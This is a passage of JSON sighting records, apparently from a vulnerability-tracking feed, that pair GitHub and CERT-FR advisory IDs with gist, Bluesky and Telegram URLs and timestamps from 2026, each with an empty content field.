"2026-06-09T16:51:31.000000Z"}, {"uuid": "31b74ffc-c4a0-4136-83ba-e3760508f989", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-438c-3975-5x3f", "type": "seen", "source": "https://gist.github.com/alon710/bdf9529c95cfcca7fc47d2945f8e9599", "content": "", "creation_timestamp": "2026-06-09T16:41:36.000000Z"}, {"uuid": "f8067c6e-add1-4ffe-b75c-e5d3061b152e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p58x-r3c9-x9p6", "type": "seen", "source": "https://bsky.app/profile/hnbot.gsuscs.xyz/post/3mnwmdrqrxc2q", "content": "", "creation_timestamp": "2026-06-10T11:30:53.533177Z"}, {"uuid": "39443281-bc2f-400e-ab7b-a506e23fe2ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p58x-r3c9-x9p6", "type": "seen", "source": "https://bsky.app/profile/betterhn20.e-work.xyz/post/3mnwo7xvt7d2u", "content": "", "creation_timestamp": "2026-06-10T12:04:33.298400Z"}, {"uuid": "84447b8c-6a67-4fd3-b1f1-0ff1e96de801", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-010", "type": "seen", "source": "https://bsky.app/profile/test-cvp.bsky.social/post/3mnwrxtz35t2v", "content": "", "creation_timestamp": "2026-06-10T13:11:36.041145Z"}, {"uuid": "050be3c6-6a75-4986-9d67-f4425492607d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-010", "type": "seen", "source": "https://bsky.app/profile/test-cvp.bsky.social/post/3mnwrnzcbsc2o", "content": "", "creation_timestamp": "2026-06-10T13:06:05.260635Z"}, {"uuid": "59381774-e042-4810-a9be-2c84deae7922", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-010", "type": "seen", "source": "https://bsky.app/profile/test-cvp.bsky.social/post/3mnwrkxfaf72m", "content": "", "creation_timestamp": "2026-06-10T13:04:23.078051Z"}, {"uuid": "ebd2ba14-2efd-4b26-b258-72944e94e4ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5pgg-2g8v-p4x9", "type": "seen", "source": "https://gist.github.com/jmcveen/2d2b8e075a88abf882695479e38437d1", "content": "", "creation_timestamp": "2026-06-10T16:20:08.000000Z"}, {"uuid": "e36e399b-6507-4f1f-95b6-b357c92761e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mwv6-3258-q52c", "type": "seen", "source": "https://gist.github.com/jmcveen/2d2b8e075a88abf882695479e38437d1", "content": "", "creation_timestamp": "2026-06-10T16:20:08.000000Z"}, {"uuid": "5883e9dd-8bd2-45fb-bdd4-e9f721ebf354", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h25m-26qc-wcjf", "type": "seen", "source": "https://gist.github.com/jmcveen/2d2b8e075a88abf882695479e38437d1", "content": "", "creation_timestamp": "2026-06-10T16:20:08.000000Z"}, {"uuid": "2a3599bb-b625-437c-98f8-c95fd2ebea66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4r6h-8v6p-xvw6", "type": "seen", "source": "https://gist.github.com/jmcveen/2d2b8e075a88abf882695479e38437d1", "content": "", "creation_timestamp": "2026-06-10T16:20:08.000000Z"}, {"uuid": "57c4c972-b5e1-4aeb-bcbd-9b56f5e7e874", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p9cg-vqcc-grcx", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mnxsdlo6672x", "content": "", "creation_timestamp": "2026-06-10T22:51:05.910004Z"}, {"uuid": "f82399f9-05b7-4b44-9ee1-779a89fbd609", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p58x-r3c9-x9p6", "type": "seen", "source": "https://bsky.app/profile/sagalinked.bsky.social/post/3mny3xvfhz227", "content": "", "creation_timestamp": "2026-06-11T01:43:14.457590Z"}, {"uuid": "bb73886d-e1b0-4775-903f-1b29a927d3e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-934w-87qh-qr26", "type": "seen", "source": "https://gist.github.com/alon710/aedd4394e8d823981bff81789fa6dc8a", "content": "", "creation_timestamp": "2026-06-16T14:21:22.000000Z"}, {"uuid": "1e3f25c3-a32c-4054-bce8-b363143a3acf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qvv5-jq5g-4cgg", "type": "seen", "source": "https://gist.github.com/ti-codetec/595cf90f9edd6fcd9e1bb577dea0089b", "content": "", "creation_timestamp": "2026-06-16T14:09:03.000000Z"}, {"uuid": "d509770d-78c0-4e52-b7c1-15bc9b9886e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gj48-438w-jh9v", "type": "seen", "source": "https://gist.github.com/alon710/ca91eafc27ab49b122bd87e653053fb2", "content": "", "creation_timestamp": "2026-06-16T14:41:17.000000Z"}, {"uuid": "47022ec7-45f7-4fc0-a9ab-47badd4d7267", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m557-wrgg-6rp4", "type": "seen", "source": "https://gist.github.com/alon710/2ea9580acec8d03d5972005197773fa7", "content": "", "creation_timestamp": "2026-06-16T15:41:15.000000Z"}, {"uuid": "f5348690-24e6-474a-bab1-cb8c800788b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gr75-jv2w-4656", "type": "seen", "source": "https://gist.github.com/alon710/c44712b7c2bb082240930f6c62996619", "content": "", "creation_timestamp": "2026-06-16T16:11:24.000000Z"}, {"uuid": "64aa3b7c-4a47-4e25-a3e9-cf7916512bbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g75f-g53v-794x", "type": "seen", "source": "https://gist.github.com/alon710/5922ad26f6aa39fcda791f945c3402e2", "content": "", "creation_timestamp": "2026-06-16T16:41:37.000000Z"}, {"uuid": "9709d6d9-1a13-4289-b966-723c634bb089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8RFP-98V4-MMR6", "type": "seen", "source": "https://gist.github.com/alon710/e8893a7e1e93a2bc7611803f8c648ff8", "content": "", "creation_timestamp": "2026-06-16T17:11:34.000000Z"}, {"uuid": "a354b7ec-7bd9-4855-9079-58cc2ae69007", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-534h-c3cw-v3h9", "type": "seen", "source": "https://gist.github.com/alon710/c72d8ccc2ba2b93c204ffeec4b0037ef", "content": "", "creation_timestamp": "2026-06-16T18:01:13.000000Z"}, {"uuid": "31b27a44-ebfe-48b5-8b54-92278bafb65b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-365w-hqf6-vxfg", "type": "seen", "source": "https://gist.github.com/alon710/e1deec66b2e7d16cb3f78258fba2c87d", "content": "", "creation_timestamp": "2026-06-16T20:51:26.000000Z"}, {"uuid": "06b88bf3-5f50-4f22-b25a-aa42598b075c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f989-c77f-r2cq", "type": "seen", "source": "https://gist.github.com/alon710/ea8299cfda138a4a029849fc1be10207", "content": "", "creation_timestamp": "2026-06-16T21:11:18.000000Z"}, {"uuid": "bc889679-6b91-4609-89e4-59acace2e87e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-88fw-hqm2-52qc", "type": "seen", "source": "https://gist.github.com/konard/056d8d6804564c2fffaccf92c7483ba5", "content": "", "creation_timestamp": "2026-06-16T21:33:02.000000Z"}, {"uuid": "b256c5f9-f757-4c8a-a113-53c0c79f17df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rv63-4mwf-qqc2", "type": "seen", "source": "https://gist.github.com/konard/056d8d6804564c2fffaccf92c7483ba5", "content": "", "creation_timestamp": "2026-06-16T21:33:02.000000Z"}, {"uuid": "25023a0c-f59c-412e-9ec1-8138cf1010ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m7jm-9gc2-mpf2", "type": "seen", "source": "https://gist.github.com/konard/056d8d6804564c2fffaccf92c7483ba5", "content": "", "creation_timestamp": "2026-06-16T21:33:02.000000Z"}, {"uuid": "d356a35c-e3ac-4d90-8b37-99a7b4abf7bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5rq4-664w-9x2c", "type": "seen", "source": "https://gist.github.com/konard/056d8d6804564c2fffaccf92c7483ba5", "content": "", "creation_timestamp": "2026-06-16T21:33:02.000000Z"}, {"uuid": "ba962e64-29b7-4927-84d2-63e02b06e262", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wwfh-h76j-fc44", "type": "seen", "source": "https://gist.github.com/konard/056d8d6804564c2fffaccf92c7483ba5", "content": "", "creation_timestamp": "2026-06-16T21:33:02.000000Z"}, {"uuid": "955fdc2c-4d10-4a53-bbf9-a454f0d0abe5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h67p-54hq-rp68", "type": "seen", "source": "https://gist.github.com/konard/056d8d6804564c2fffaccf92c7483ba5", "content": "", "creation_timestamp": "2026-06-16T21:33:02.000000Z"}, {"uuid": "0763edec-0898-4f46-a312-b069f70728c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wgpf-jwqj-8h8p", "type": "seen", "source": "https://gist.github.com/konard/056d8d6804564c2fffaccf92c7483ba5", "content": "", "creation_timestamp": "2026-06-16T21:33:02.000000Z"}, {"uuid": "f50609e8-7fad-4173-ae97-a342e944d547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8988-4f7v-96qf", "type": "seen", "source": "https://gist.github.com/konard/056d8d6804564c2fffaccf92c7483ba5", "content": "", "creation_timestamp": "2026-06-16T21:33:02.000000Z"}, {"uuid": "03d937bd-b1ae-491b-94be-39b9c4d0692b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j6c9-x7qj-28xf", "type": "seen", "source": "https://gist.github.com/konard/056d8d6804564c2fffaccf92c7483ba5", "content": "", "creation_timestamp": "2026-06-16T21:33:02.000000Z"}, {"uuid": "11fa57df-f24a-4d34-9b2b-c41ecf1552ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vmf3-w455-68vh", "type": "seen", "source": "https://gist.github.com/konard/056d8d6804564c2fffaccf92c7483ba5", "content": "", "creation_timestamp": "2026-06-16T21:33:02.000000Z"}, {"uuid": "e6906526-346b-4a29-8ea3-6a4965920838", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-88fw-hqm2-52qc", "type": "seen", "source": "https://gist.github.com/konard/b5022a7dd742df01e2f9265d5908dcad", "content": "", "creation_timestamp": "2026-06-16T21:24:00.000000Z"}, {"uuid": "7b74ea6e-416f-42d4-86e7-531ce81708f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rv63-4mwf-qqc2", "type": "seen", "source": "https://gist.github.com/konard/b5022a7dd742df01e2f9265d5908dcad", "content": "", "creation_timestamp": "2026-06-16T21:24:00.000000Z"}, {"uuid": "4a023be1-2bbe-4caa-86d0-4b9b5bbb2a42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j6c9-x7qj-28xf", "type": "seen", "source": "https://gist.github.com/konard/b5022a7dd742df01e2f9265d5908dcad", "content": "", "creation_timestamp": "2026-06-16T21:24:00.000000Z"}, {"uuid": "d0b7231f-9180-4c7c-b2fc-73022eea5d40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wwfh-h76j-fc44", "type": "seen", "source": "https://gist.github.com/konard/b5022a7dd742df01e2f9265d5908dcad", "content": "", "creation_timestamp": "2026-06-16T21:24:00.000000Z"}, {"uuid": "d1174d96-55c8-4f9a-b7d0-e7f969fe2b6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8988-4f7v-96qf", "type": "seen", "source": "https://gist.github.com/konard/b5022a7dd742df01e2f9265d5908dcad", "content": "", "creation_timestamp": "2026-06-16T21:24:00.000000Z"}, {"uuid": "076fde92-0794-4978-9945-40b72e7b9ace", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7cx2-g3h9-382p", "type": "seen", "source": "https://gist.github.com/alon710/d499538761d587fbb74d51e5882b31ec", "content": "", "creation_timestamp": "2026-06-16T21:41:28.000000Z"}, {"uuid": "6473b831-ce36-48f2-9220-336db82889d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-69qj-pvh9-c5wg", "type": "seen", "source": "https://gist.github.com/alon710/2d3358848147c1728694a3629d631316", "content": "", "creation_timestamp": "2026-06-16T22:41:17.000000Z"}, {"uuid": "9f39ed98-dd38-40a6-b32a-65d5dfa0e104", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-69qj-pvh9-c5wg", "type": "seen", "source": "https://gist.github.com/alon710/67012fd2d01a0b46570236682933fc3c", "content": "", "creation_timestamp": "2026-06-16T23:01:53.000000Z"}, {"uuid": "139a49db-fe17-4ce4-8cce-c6b2b0596afa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6m52-m754-pw2g", "type": "seen", "source": "https://gist.github.com/alon710/304448ca1233c754404dc0354510a0d3", "content": "", "creation_timestamp": "2026-06-17T00:11:28.000000Z"}, {"uuid": "663e5165-e0cd-42da-9240-f65dcb4df203", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x6qj-4h56-5rj5", "type": "seen", "source": "https://gist.github.com/alon710/304448ca1233c754404dc0354510a0d3", "content": "", "creation_timestamp": "2026-06-17T00:11:28.000000Z"}, {"uuid": "4d7b6775-d0a2-43aa-b1b3-7f8eb7077f1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6m52-m754-pw2g", "type": "seen", "source": "https://gist.github.com/alon710/5a51983a1e4f931f3bc541f627d26823", "content": "", "creation_timestamp": "2026-06-17T00:21:33.000000Z"}, {"uuid": "454b8408-5057-4d37-b41b-daa3baacbbe0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x6qj-4h56-5rj5", "type": "seen", "source": "https://gist.github.com/alon710/5a51983a1e4f931f3bc541f627d26823", "content": "", "creation_timestamp": "2026-06-17T00:21:33.000000Z"}, {"uuid": "5fe187ab-e4ca-478f-9b40-561b07a9c800", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m3q2-p4fw-w38m", "type": "seen", "source": "https://gist.github.com/alon710/244419ca59c137ef079d33a9b117602b", "content": "", "creation_timestamp": "2026-06-17T00:41:42.000000Z"}, {"uuid": "3ca9be3f-2fc6-45a9-b537-e6b76b4cae60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8grp-wcq9-925q", "type": "seen", "source": "https://gist.github.com/alon710/244419ca59c137ef079d33a9b117602b", "content": "", "creation_timestamp": "2026-06-17T00:41:42.000000Z"}, {"uuid": "d2e49c3f-afc1-4531-b2bc-299fec360c8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rpr9-rxv7-x643", "type": "seen", "source": "https://gist.github.com/evanpelle/dffeb5f7d26df28bdb72e87289fe0f0c", "content": "", "creation_timestamp": "2026-06-17T01:40:09.000000Z"}, {"uuid": "c7105449-6867-4a0e-8aaa-d286381d2f7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4xpc-pv4p-pm3w", "type": "seen", "source": "https://bsky.app/profile/blackhatnews.tokyo/post/3mohkg5ewtq2d", "content": "", "creation_timestamp": "2026-06-17T05:11:40.817318Z"}, {"uuid": "968a34d8-c5d6-4a11-91ab-92ff834a801c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H3JJ-5F3V-3685", "type": "seen", "source": "https://gist.github.com/alon710/65e1d568e6055790b920bb58e503275b", "content": "", "creation_timestamp": "2026-06-17T06:41:15.000000Z"}, {"uuid": "a989da11-ee62-4703-b9aa-e051161a5d58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jwm3-qcfw-c5pp", "type": "seen", "source": "https://gist.github.com/alon710/8b7e25353cc061230cbe51b2eb337874", "content": "", "creation_timestamp": "2026-06-17T07:12:05.000000Z"}, {"uuid": "5581cfb8-0015-4257-9781-a4c602d89280", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jwm3-qcfw-c5pp", "type": "seen", "source": "https://gist.github.com/alon710/1e67864e99b4742c1095816dbc6f28c7", "content": "", "creation_timestamp": "2026-06-17T07:21:45.000000Z"}, {"uuid": "0ea3b0ac-a1b5-452f-95f3-30a64a8f9d98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-88fw-hqm2-52qc", "type": "seen", "source": "https://gist.github.com/konard/bd8cfa5a7a3dca3e6dbcf8dffd6adf2b", "content": "", "creation_timestamp": "2026-06-17T10:01:05.000000Z"}, {"uuid": "af912532-1bd8-4d82-bec1-e79cbf45d547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7xh3-mhg9-jcw8", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3moi4lqjxxk2f", "content": "", "creation_timestamp": "2026-06-17T10:36:55.719628Z"}, {"uuid": "cf8f907c-488c-4342-a670-2f8b03e48f8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-664H-GPGQ-H6XX", "type": "seen", "source": "https://gist.github.com/alon710/b786193466cf6568b5f90f26b1c3038d", "content": "", "creation_timestamp": "2026-06-17T14:31:19.000000Z"}, {"uuid": "b6a46040-daeb-4ae1-8caf-f71e5ada101f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3rm2-h79c-8qw6", "type": "seen", "source": "https://gist.github.com/alon710/bea1abe85bdbc7360f709e8ba11f8e2a", "content": "", "creation_timestamp": "2026-09-19T11:31:49.504851Z"}, {"uuid": "09353cc1-0b9e-4194-b3a2-19ebae8bff8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p5vg-v7mj-f6q4", "type": "seen", "source": "https://gist.github.com/alon710/9fb1086f5e4e9b47992fc238d03c86ef", "content": "", "creation_timestamp": "2026-09-19T10:31:27.745447Z"}, {"uuid": "81a25e6d-48c7-43d1-9e58-a63abaa48715", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5gm3-9crp-6g3v", "type": "seen", "source": "https://gist.github.com/alon710/66235754231ab35fdbefaafc90c146d5", "content": "", "creation_timestamp": "2026-09-19T09:31:52.626038Z"}, {"uuid": "7a4c587d-550c-4a8b-b5be-0652a11ccfdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7q85-xj36-vmfc", "type": "seen", "source": "https://gist.github.com/alon710/43058acd721510462931518910022d1c", "content": "", "creation_timestamp": "2026-09-19T08:31:44.326652Z"}, {"uuid": "5cf65de3-7785-4e12-8fe0-3d14cc3653a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3753-m2x2-q623", "type": "seen", "source": "https://gist.github.com/alon710/bf97988f1160e11a1fe815e1134e8b70", "content": "", "creation_timestamp": "2026-09-19T07:32:11.961070Z"}, {"uuid": "2e8201fc-8957-400c-8ce3-fef50574acd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cjgj-2fwf-4c2w", "type": "seen", "source": "https://gist.github.com/alon710/0b31ec47bc74ca943ea96e388e1d1f47", "content": "", "creation_timestamp": "2026-09-19T06:32:20.282761Z"}, {"uuid": "cd5dcc32-8356-4d83-bf6e-9ec2af64db83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4227-9989-jrhx", "type": "seen", "source": "https://gist.github.com/alon710/de46e4b55e23d058335a512366f2ab2a", "content": "", "creation_timestamp": "2026-09-19T05:32:22.112754Z"}, {"uuid": "782b9d29-d2db-49d2-b6ba-c6813c008213", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jqq5-8px3-9m6m", "type": "seen", "source": "https://gist.github.com/alon710/1dd7eb9b2d2403233c4fe934b5852750", "content": "", "creation_timestamp": "2026-05-22T06:10:50.000000Z"}, {"uuid": "b52d79ca-e8f9-446c-bf67-94f61d772f3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-chgx-jx3p-rf73", "type": "seen", "source": "https://bsky.app/profile/tesaguri.fedibird.com.ap.brid.gy/post/3mmgowt2krrm2", "content": "", "creation_timestamp": "2026-05-22T10:09:41.867652Z"}, {"uuid": "a4a687a1-11b4-452a-b71f-09126e67faf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6f5f-hv3v-36g2", "type": "seen", "source": "https://gist.github.com/dmitriy-bty/0c7ba90ea643261f10d7aa2d6cbfa338", "content": "", "creation_timestamp": "2026-05-22T14:07:14.000000Z"}, {"uuid": "dfe7c076-45b4-4551-9565-850a4d078b19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4xc5-wfwc-jw47", "type": "seen", "source": "https://bsky.app/profile/euvd-bot.bsky.social/post/3mmhmngebaz26", "content": "", "creation_timestamp": "2026-05-22T19:01:09.060322Z"}, {"uuid": "78d802e2-04fd-4a29-b1bc-1b107d47d711", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qx2v-qp2m-jg93", "type": "seen", "source": "https://gist.github.com/konard/649db61832d01e9e237bbf281b033df5", "content": "", "creation_timestamp": "2026-05-25T11:12:19.000000Z"}, {"uuid": "e4cb7be5-2bef-4267-a6ee-ef5d5ffd4366", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qx2v-qp2m-jg93", "type": "seen", "source": "https://gist.github.com/konard/0fa64e99614f285a77b6079698b5b5e3", "content": "", "creation_timestamp": "2026-05-25T11:11:11.000000Z"}, {"uuid": "45f24767-ba78-4d89-a9da-e481c39c935e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-86qp-5c8j-p5mr", "type": "seen", "source": "https://gist.github.com/konard/1df63152a8fa23d9ee65875a3fd172e2", "content": "", "creation_timestamp": "2026-05-25T13:07:35.000000Z"}, {"uuid": "27af5803-a4fc-438b-832a-69d379576802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5X7J-XJPX-PMM5", "type": "seen", "source": "https://t.me/GithubRedTeam/86181", "content": "", "creation_timestamp": "2026-05-28T00:01:41.000000Z"}, {"uuid": "3ef2fa60-1fdf-4e69-aef6-07984d48b61c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-024", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mnc5u7bels2o", 